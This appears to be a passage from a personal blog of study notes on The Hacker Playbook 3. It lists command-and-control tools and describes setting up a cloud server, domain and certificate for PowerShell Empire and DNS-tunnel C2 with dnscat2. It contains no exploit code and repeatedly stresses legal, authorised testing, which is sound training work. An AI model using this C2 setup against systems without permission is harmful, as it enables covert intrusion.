The tko-subs tools is interesting and straightforward. There are 2 other tools listed for domain takeovers – HostileSubBruteforcer and autoSubTakeover – but I didn’t get into either other than confirming their existence and taking a quick look at the README.

Kim ends the cloud section with a link to the flAWS challenge that is a CTF for AWS. This is something I’ll file for future usage.


Can we agree that publishing an online directory of employee emails that are the same as the username convention should be frowned upon? It’s one thing to get the format of emails – that can be helpful for social engineering and digging for more info, but having half of the login creds (provided two-factor isn’t being used), just sounds like a bad idea.

SimplyEmail worked well. No issues there. YAY! I did note that like several other tools, it’s now been tested with Docker, so Docker is definitely something to get more comfortable with as a pen tester.

Then Kim talks about past breaches. There’s a lot of stuff out there. There are good ways of accessing some of the info (like haveIbeenpwned) and not good ways (like buying the info). Keep it legal folks.


The chapter ends with a brief mention of OSINT stuff. There’s a ton of stuff. I’m working through Michael Bazzell’s Open Source Intelligence Techniques 6th ed, which is great. I could do an entire post just on OSINT stuff that I’m finding useful, so I’ll leave that for later.

Lessons Learned

I got a ton out of this chapter. A few highlights…

  • Check syntax on a big screen where you can more easily identify spacing, etc.
  • Get both URL and IP info for targets – some tools will only accept one or the other
  • Be sure to add the URL and IP info to the hosts file if working on a test network
  • Look more into tools being presented so you understand the risks/benefits – check them out to make sure they are what they say they are (see Slurp earlier)
  • Check Kim’s updates as you go to keep an eye on changes
  • I’m amassing a ridiculous amount of info on various tools and what not and have to have a way to keep them organized and up to date
  • Taking notes in this format means I have to figure out why things aren’t working and fix the problem
  • Doesn’t look like there will be any “short” chapter notes for this book
  • Writing these in Markdown saves a stupid amount of time when posting

Next steps

  • Play around more with Shodan and Censys
  • Look into API keys for recon-ng: Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, and Shodan
  • Look into API key for Knock: VirusTotal
  • Develop scheme for keeping track of tool info – check out RTFM and BTFM as potential sources, but will want something dynamic b/c Slurp
  • Figure out why WordPress didn’t like my code fences
Posted in Blog, Resources

THP3 Ch 1 Review

My book club has moved on from Practical Packet Analysis (great read – highly recommend) to The Hacker Playbook 3. I plan to write up notes on each chapter, mostly for my reference. These will likely be mostly pictureless brain dumps, but may give some useful info. So here goes…

Disclaimer – hacking is illegal, read CFAA, don’t go to jail, etc.

Preface notes

Author Peter Kim recommends doing the hands-on work, including pushing scripts and code to Github. That’s a little scary to think about (people will see!), but a good idea. So I’ve set up a repository on my Github for THP3 stuff. The blog posts/notes will serve as more of my record since I’m not sure how much script writing I’ll actually be doing.

Remember hacking is illegal, disclaimers, etc. Big thing here is get WRITTEN permission and make sure the powers that be know what’s going on. A side note here is that this may include third parties such as cloud vendors. Luckily there are lots of legal places to practice hacking and pen testing. I have a bunch that I like, but that’s a different post.

Intro notes

Interesting comparison of pen testing versus red teaming. I see the need for both, but I suspect red teams as described are beyond the capabilities of most orgs. Kim also mentions showing value back to the company. This seems to be something that can be a struggle in cybersecurity in general. It’s hard to put value on something being avoided, but it’s something that needs to be done.

1 Pregame – The Setup notes

Lots of good background in this chapter, but the bulk was getting set up. Kim recommends setting up an external server. I’m definitely more comfortable using a VM, but I decided the practice would be good for me. I went with an Amazon Lightsail server running Ubuntu. Doing this with the recommended specs will probably run about $5/month. You could opt to set everything up using VMs, but I wanted the practice and learning at least a little about AWS can only be good for me.

Spinning up the instance was simple and only took a few minutes. You can access the server through a CLI setup in the browser or use an SSH client. I’ve mostly used the CLI option so far, but I’ve got Putty downloaded to setup the SSH option. Kim does note the need to set up iptables for your VPS (virtual private server). This is a firewall utility built into Linux. I want to get into this more, but for now I’m using the firewall manager through AWS. I need to find out more about how the 2 will work together or fight before I start with iptables. Plus since I can access the AWS firewall from the dashboard, I’m less likely to fork my access. I’m making notes of things I need to follow-up on, but I want to stay on task with the material.

Installing The PenTester’s Framework was straightforward. There are lots of instructions on how to do that, so I’m not going to get into that here.

I will note that a lot of the tools that are talked about the rest of the chapter are included in PTF, so you don’t necessarily need to install them separately. I’ve worked with PTF a little, but I’ve done more in Kali. I’m looking forward to working with both as I work through the book. Kim talks about having a process to repeatedly setup machines and mentions the possibility of running Kali in Docker on AWS. This is something I’ll need to work on later, but it was simple to spin up the instance and get PTF loaded. I have a process for when I start a new Kali VM to install the non-standard tools that I like, so I’ll add tools to that process as appropriate.

Some of the tools mentioned…yes, I’m being lazy and not doing the links.

  • Metasploit – it’s Metasploit, lots of info out there
  • Cobalt Strike – license is expensive, so I’m waiting to do a trial for when I know I’m going to have dedicated time to spend. Armitage seems to be a relative and is pretty straightforward.
  • PowerShell Empire – needs a real cert to work best. More on this later.
  • dnscat2 – creates an encrypted command and control channel, should be fun to play with. Has turned into a pain, but I’m sure will be a good learning experience.
  • p0wndedShell – C# PowerShell host app that isn’t really PowerShell. Just installed, no labbing yet.
  • Pupy Shell – run Python on all the things without installing Python. Just installed, no labbing yet.
  • PoshC2 – command and control thing in PowerShell to help hack things. Just installed, no labbing yet.
  • Merlin – do cool things with HTTP/2. Just installed, no labbing yet.
  • Nishang – use PowerShell for red team stuff. Just installed, no labbing yet.

Getting most of these installed and testing them out was straightforward. I’m waiting on Cobalt Strike, so other than thinking it looks cool, no real thoughts there. Getting a cert installed for PowerShell Empire was the biggest hurdle. This was more because it seemed daunting than anything else.

Setting up for PowerShell Empire

Really brief summary of getting Empire going (at least to the level I need right now).

  1. Get a domain name. I picked up a cheap one from NameCheap.
  2. Set your AWS instance to a permanent IP.
  3. Install domain name on AWS instance. This post from Joshua Miller had great instructions using NameCheap. Note – you manage DNS in AWS from the overall dashboard, not the instance dashboard.
  4. Make sure your domain name was connected by navigating by name rather than IP. This may take some time, but it happened within minutes for my instance.
  5. Get a trusted cert and install it on AWS instance. This post from Black Hills Info Sec had a great walkthrough. Probably should make a note of the cert path (/etc/letsencrypt/live/[domain]/fullchain.pem).
  6. Check and make sure your domain name now works as https.
  7. Wonder why your domain name isn’t working as https.
  8. Keep wondering…
  9. Facepalm when you realize you forgot to adjust the firewall to allow https.
  10. Laugh at yourself for forgetting to adjust the firewall and remind your book club that they might need to let https through the firewall of their VPS.

And laugh again when Ian Coldwater tweets about breaking the Internet by leaving Intercept on. Because you’ve done that at least once this week and you’ve accepted breaking the Internet is going to happen regularly when you’re doing this stuff. Just remember to check your stuff before panicking and yelling at your ISP.

dnscat2 setup

The other bit of oddness was getting setup for dnscat2. The author used GoDaddy, so I had to do some experimenting for Namecheap. I got my domain added under the personal DNS server (with ns1.[IP] and ns2.[IP]) and nameservers (ns1.[url] and ns2.[url]). Note that to get your personal DNS servers to show in the dashboard on Namecheap, you need to do a search – it doesn’t show up automatically, so I kept thinking I screwed something up. I wasn’t entirely confident in what I had done, so I did dome digging and found good references from iagox86 (the tool’s author) and The Subtlety. I was able to check and make sure the setup was working. I ran into another error – address in use – when I ran the script to start dnscat2.

After some digging, it seems there can be an issue with Ubuntu and systemd-resolved. Looking over some things – a StackExchange about the issue and the man page for systemd-resolved, I think this is causing a conflict with DNS resolution. You can check the processes running with netstat -plnt to see exactly what the issue is. Killing the process just using kill didn’t work, so I tried stopping that process (probably not great idea), but it let dnscat2 work. And it’s easy enough to start and stop the process (systemctl start/stop systemd-resolved). So I got the server working, but then the client timed out. More head banging…but luckily someone in the book club had dealt with this fix and had a write up – thanks Vext! I also found a walkthrough for using dnscat2 with PowerShell from Black Hills Information Security that I want to file for future reference. Basically you have to add the --no-cache option when setting up the server. Based on the posts from Vext and Black Hills, it’s an issue with DNS and may be either DNSSEC related (based on Vext’s experimenting) or that nslookup uses non-initially randomized transaction IDs for DNS (per Luke Baggett’s Black Hills post). Either way, it solved the problem.


That wraps up chapter 1. Lots of good info. There was a lot of stuff I’m familiar with, but setting up a Lightsail instance was definitely outside of my comfort zone. It wasn’t difficult once I made myself just sit down and do it, but there’s something a little more serious about setting up a VPS than a VM. I also spent some time playing with Armitage during an ICS training, and if Cobalt Strike is a better version of that, I completely see its worth.

I definitely need to spend some time with Empire and dnscat2. There wasn’t much hands-on stuff with the other tools, just getting them installed. There were a lot of installs that duplicated what’s already there with PTF. Hopefully the duplicate installs won’t break anything, but I know that’s a possibility. But the nice thing about a VPS is if it gets completely forked, I can either backup to a previous snapshot or kill it and make a new one. That’s not remotely the attitude I would take with a production server, but it’s nice for labs.

Moving forward…

The amount of info in the book is very dense, and it’s definitely not a cookbook with exact steps and syntax written out. I feel like this is good and bad. It’s good because I’m having to look up more information about the tools, what they do, and how to use them. I’m also figuring out where I want to put things to stay organized since I’m installing some of the tools on my other VMs. There were several places where the earlier editions were referenced with the indication that the material wouldn’t be repeated in the third edition. I understand that, but it would have been helpful to have all of the material together.

I’m really glad I’m doing this for the book club in the BrakeSec Podcast Slack. Being able to bounce ideas off of the rest of the group has been invaluable. I would get through it on my own, but the accountability and having people to work through issues with is going to make it a lot easier. I hope to start getting my notes up closer to the book club discussion, but we’ll see how that goes.